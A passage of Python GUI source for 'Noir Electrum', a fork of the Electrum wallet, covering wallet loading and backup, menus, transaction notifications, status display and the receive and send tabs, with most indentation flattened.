if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
            t.daemon = True
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Noir Electrum Testnet" if constants.net.TESTNET else "Noir Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Noir with it."),
_("Make sure you own the seed phrase or the private keys, before you request Noir to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Noir Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Noir Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://noirofficial.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('noir:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Noir Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Noir Electrum's focus is speed, with low resource usage and simplifying Noir.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Noir system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/noirofficial/electrum/issues\">https://github.com/noirofficial/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Noir Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Noir Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Noir Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Noir Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Noir address where the payment should be received. Note that each payment request uses a different Noir address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Noir addresses.'),
_('The Noir address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Noir address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Noir transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Noir Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
